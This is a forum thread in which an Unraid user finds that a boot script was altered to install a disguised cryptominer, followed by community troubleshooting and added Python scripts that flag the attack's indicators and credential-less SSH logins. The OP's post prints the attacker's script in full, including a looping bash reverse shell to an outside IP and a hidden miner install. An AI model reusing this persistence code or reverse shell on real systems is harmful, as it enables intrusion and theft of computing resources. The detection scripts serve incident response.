JackDewhurst (OP), posted February 4, 2021 (edited March 17, 2021: updated title)

Hi all,

Recently my server has been maxing out the CPU on all cores on boot. I've tried stopping all Docker apps and arrays, but the issue persists. Running top in a terminal shows the process is mysql_daemon. Can I shut this process down, or is it needed by the OS for something?
trurl, posted February 4, 2021

Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.
JackDewhurst (OP), posted February 4, 2021

Hi trurl, sure, here are the diagnostics.

server-diagnostics-20210204-1839.zip
trurl, posted February 5, 2021

23 hours ago, JackDewhurst said:
    tried stopping all docker apps and arrays

And the few plugins you have I don't think use that, so I don't know why it would still be running.
JackDewhurst (OP), posted February 5, 2021

I can kill it with kill -9 <pid> and it doesn't seem to have any detrimental effect on the system. I'll just do this for the time being until I work out what the cause is.
JackDewhurst (OP), posted March 17, 2021

On 2/5/2021 at 3:03 PM, trurl said:
    And the few plugins you have I don't think use that so I don't know why it would still be running.

Just a follow-up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! Full file contents below (lines ending in ">" are cut off as they were displayed):

    #!/bin/bash
    # Start the Management Utility
    /usr/local/sbin/emhttp &
    mkdir /root/.ssh
    chmod 700 /root/.ssh
    cp /boot/config/ssh/authorized_keys /root/.ssh/
    chmod 600 /root/.ssh/authorized_keys
    nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
    cd /dev/shm
    wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
    tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
    cd xmrig-6.7.0/
    mv xmrig /usr/bin/mysql_daemon
    mkdir -p /etc/mysql/conf.d
    echo '{
      "autosave": true,
      "background": true,
      "cpu": { "enabled": true, "max-threads-hint": 50 },
      "max-cpu-usage": 25,
      "cpu-priority": 1,
      "opencl": false,
      "cuda": false,
      "pools": [
        {
          "url": "pool.minexmr.com:443",
          "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
          "keepalive": true,
          "tls": true
        }
      ]
    }' > /etc/mysql/conf.d/.config.json
    /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
    rm -r /dev/shm/xmrig-6.7.0
    rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

Not sure how they got access to be able to do this, but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc.
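The go file above is the whole persistence mechanism: Unraid runs /boot/config/go from the flash drive at every boot, so anything appended to it survives a reboot even though the rest of the OS lives in RAM. Below is an added triage script (not code from the thread or from Unraid) that compares a go file against the stock three-line default and flags the techniques the posted script used: a bash /dev/tcp reverse shell wrapped in nohup and a while-true loop, staging in /dev/shm, a download from the internet, a binary renamed to a service-sounding name under /usr/bin, a dot-file config under /etc, a mining-pool reference, and self-cleanup. The indicator names, the regexes and the verdict thresholds are my choices; the sample input is the posted go file with its truncation marks kept and the echo'd JSON condensed.

```python
"""Triage an Unraid /boot/config/go file for the persistence pattern posted above.

Added example, not from the thread or from Unraid. Usage: python go_triage.py
(prints indicator hits and a verdict for the embedded sample).
"""
import re

# Stock Unraid go file: the unmodified default. Anything beyond these lines is
# an addition and deserves a look, even the benign ones (e.g. restoring SSH keys).
STOCK_GO = (
    "#!/bin/bash\n"
    "# Start the Management Utility\n"
    "/usr/local/sbin/emhttp &\n"
)

# Indicator name -> regex. Deliberately broad so variants (other ports, other
# miner names, curl instead of wget) are caught too, not just this exact script.
INDICATORS = [
    ("reverse_shell",    re.compile(r"/dev/(tcp|udp)/[\w.-]+/")),
    ("persistent_loop",  re.compile(r"\bnohup\b.*\bwhile\s+true\b")),
    ("staging_in_tmpfs", re.compile(r"\b(cd|wget|curl|tar)\b.*(/dev/shm|/tmp|/var/tmp)")),
    ("remote_download",  re.compile(r"\b(wget|curl)\b\s+\S*https?://")),
    ("renamed_binary",   re.compile(r"\bmv\s+\S+\s+/(usr/)?s?bin/")),
    ("hidden_config",    re.compile(r"/etc/\S*/\.[A-Za-z0-9_.-]+")),
    ("mining_pool",      re.compile(r"(xmrig|minexmr|monero|stratum\+tcp|pool\.\S+:\d+)", re.I)),
    ("self_cleanup",     re.compile(r"\brm\s+-rf?\s+/dev/shm/")),
]


def extra_lines(go_text):
    """Non-blank lines that are not part of the stock go file."""
    stock = set(STOCK_GO.splitlines())
    return [l for l in go_text.splitlines() if l.strip() and l not in stock]


def flag_indicators(go_text):
    """Return {indicator_name: [matching lines]} for every indicator that fires."""
    hits = {}
    for line in go_text.splitlines():
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def verdict(go_text):
    """'clean' for a stock file, 'review' for a modified one, 'compromised' when
    a reverse shell or a mining-pool reference is present."""
    hits = flag_indicators(go_text)
    if {"reverse_shell", "mining_pool"} & hits.keys():
        return "compromised"
    return "review" if extra_lines(go_text) else "clean"


# Sample input: the go file from the post above. Lines ending in ">" are
# truncated exactly as the forum showed them; the echo'd JSON is condensed.
POSTED_GO = """#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{ "background": true, "pools": [ { "url": "pool.minexmr.com:443", "tls": true } ] }' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz
"""

if __name__ == "__main__":
    for name, lines in flag_indicators(POSTED_GO).items():
        print(name + ":")
        for l in lines:
            print("    " + l)
    print("verdict:", verdict(POSTED_GO))
```

Note that the four SSH-key lines are a common legitimate addition to an Unraid go file, which is why the script reports them as "review" rather than "compromised"; the decision is driven by the reverse shell and the pool reference, not by the mere fact that the file was edited. Run the same check on the copy in your flash backup if you want to know when the change first appeared.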
BRiT, posted March 17, 2021

This is why no one should set up their servers to be exposed to the internet.
JackDewhurst (OP), posted March 17, 2021 (edited)

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. I just added a few Docker containers like Plex and Radarr.
itimpi, posted March 17, 2021

13 hours ago, JackDewhurst said:
    I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

Are you sure you have not opened up any inbound ports on your router or put Unraid into the DMZ? Normally a router will block all inbound connections by default.
trurl, posted March 26, 2021

@JackDewhurst

On 3/17/2021 at 8:26 AM, BRiT said:
    This is why no one should set up their servers to be exposed to the internet.

Now that we are more attuned to these sorts of things lately, I went back and looked at the OP's diagnostics. Here are some excerpts from syslog:

    Feb 4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2
    Feb 4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2
    Feb 4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2
    Feb 4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2
    Feb 4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652
    Feb 4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2
    Feb 4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2
    Feb 4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2
    Feb 4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2
    Feb 4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2
    Feb 4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2

https://www.abuseipdb.com/check/109.236.89.61 Netherlands
https://www.abuseipdb.com/check/51.77.66.36 Germany
https://www.abuseipdb.com/check/192.42.116.28 Netherlands
https://www.abuseipdb.com/check/77.247.181.163 Netherlands
https://www.abuseipdb.com/check/91.192.103.34 Switzerland
https://www.abuseipdb.com/check/185.220.102.242 Netherlands
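The lines worth reading in that excerpt are not the "Failed password" ones (that is ordinary internet brute-force noise against an exposed port 22) but the six "Accepted none for adm" lines: OpenSSH logs the authentication method that succeeded, and "none" means the client's initial request with no credential at all was accepted, which the none method only does for an account whose password is empty on a server that permits empty passwords. The script below is an added example, not code from the thread: it parses the three sshd message shapes seen above, counts them per source address, and raises an alert only for accepted logins that used the "none" method or arrived from an internet-routable address. The sample log is the excerpt from the post plus one constructed line (a LAN publickey login) to show the case that should not alert.

```python
"""Triage sshd authentication lines from a syslog excerpt.

Added example, not code from the thread. The sample lines are the ones quoted in
the post above; the final 192.168.1.50 line is constructed.
"""
import ipaddress
import re
from collections import defaultdict

# The three sshd message shapes in the post. "Failed ... for invalid user X"
# (sshd's wording for a failed login to a nonexistent account) is handled too.
SSHD_RX = re.compile(
    r"sshd\[\d+\]: "
    r"(?:(?P<outcome>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+)"
    r"|Invalid user (?P<iuser>\S+))"
    r" from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_sshd(line):
    """Return {outcome, method, user, ip, port} for an sshd auth line, else None."""
    m = SSHD_RX.search(line)
    if not m:
        return None
    if m.group("iuser"):
        outcome, method, user = "Invalid", None, m.group("iuser")
    else:
        outcome, method, user = m.group("outcome"), m.group("method"), m.group("user")
    return {"outcome": outcome, "method": method, "user": user,
            "ip": m.group("ip"), "port": int(m.group("port"))}


def is_internet(ip):
    """True for globally routable addresses; False for RFC 1918, loopback, link-local."""
    return ipaddress.ip_address(ip).is_global


def triage(lines):
    """Return (per-IP counters, alerts). An alert is an accepted login that used
    the 'none' method (no credential presented) or came from the internet."""
    per_ip = defaultdict(lambda: {"accepted": 0, "failed": 0, "invalid": 0})
    alerts = []
    for line in lines:
        ev = parse_sshd(line)
        if ev is None:
            continue
        per_ip[ev["ip"]][ev["outcome"].lower()] += 1
        if ev["outcome"] != "Accepted":
            continue
        if ev["method"] == "none":
            alerts.append(("credential-less login", ev))
        elif is_internet(ev["ip"]):
            alerts.append(("internet login", ev))
    return per_ip, alerts


# Sample input: the syslog excerpt from the post, plus one constructed line.
SAMPLE_LOG = [
    "Feb 4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2",
    "Feb 4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2",
    "Feb 4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2",
    "Feb 4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2",
    "Feb 4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652",
    "Feb 4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2",
    "Feb 4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2",
    "Feb 4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2",
    "Feb 4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2",
    "Feb 4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2",
    "Feb 4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2",
    # constructed: a key-based login from the LAN, which must not alert
    "Feb 4 11:02:10 Bruce-Willis sshd[7001]: Accepted publickey for root from 192.168.1.50 port 50122 ssh2",
]

if __name__ == "__main__":
    per_ip, alerts = triage(SAMPLE_LOG)
    for ip, counts in sorted(per_ip.items()):
        print(f"{ip:16} {counts}")
    for kind, ev in alerts:
        print(f"ALERT {kind}: {ev['user']} from {ev['ip']} via {ev['method']}")
```

The output for the posted excerpt is six credential-less logins to the adm account in under a minute from six different countries, which is the signature of an automated campaign rather than a targeted attacker, and it also dates the compromise to the same morning the diagnostics were collected. On a live system run the same check over the whole syslog, not just the lines around the miner, because the "Accepted none" lines are the ones that tell you the real entry point; the failed passwords for root only tell you port 22 was reachable.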
trurl, posted March 26, 2021

1 hour ago, jakehaas said:
    my Unraid machine is also doing the exact same thing

@jakehaas Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.
Squid, posted March 26, 2021

9 hours ago, jakehaas said:
    My home network has no ports forwarded from outside. Unlikely for this to have happened.

You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ... Alternatively, one of your clients has been hijacked.
docbrown, posted April 8, 2021 (edited)

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. The go file was set to mine crypto. I looked through my router ports that were open, and the only one I had open that was out of the ordinary was 4433 pointing to 443, from when I was trying to get the My Servers plugin to work as I had trouble with my Eero mesh router. My admin account password is very complex as well.
itimpi, posted April 8, 2021

5 minutes ago, docbrown said:
    Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router. my admin account password is very complex as well

Sounds bad if you cannot track down where this is coming from. I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that someone is getting into your system.

The other issue is how are they getting to the flash drive to change it? Is the flash drive shared on the network so that it can be accessed from another machine/device? I would recommend it is not shared on the network unless needed, and definitely do not have it shared as a public share so anyone can change its content.
docbrown, posted April 8, 2021 (edited)

13 minutes ago, itimpi said:
    Is the flash drive shared on the network...

Hmm, yes, I can access it on the network, but it doesn't appear under the Shares tab in the Unraid UI.

Edit: Main tab - Flash, durrr
itimpi, posted April 8, 2021

1 hour ago, docbrown said:
    Hmm yes i can access it on the network but it doesn't appear under the shares tab in the unraid ui. Edit: Main tab - Flash durrr

Click on the flash drive on the Main tab. I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab, as that is a more 'discoverable' location.
BRiT, posted April 8, 2021

Make sure to look at all your extras and plugins on the flash, as well as Dockers, to make sure it's not self-reinstalling on shutdown or restarts.
squirrellydw, posted April 10, 2021 (edited)

I think someone mentioned this before, but this could be the issue: Docker Hub Images With Malicious Monero Money Miners?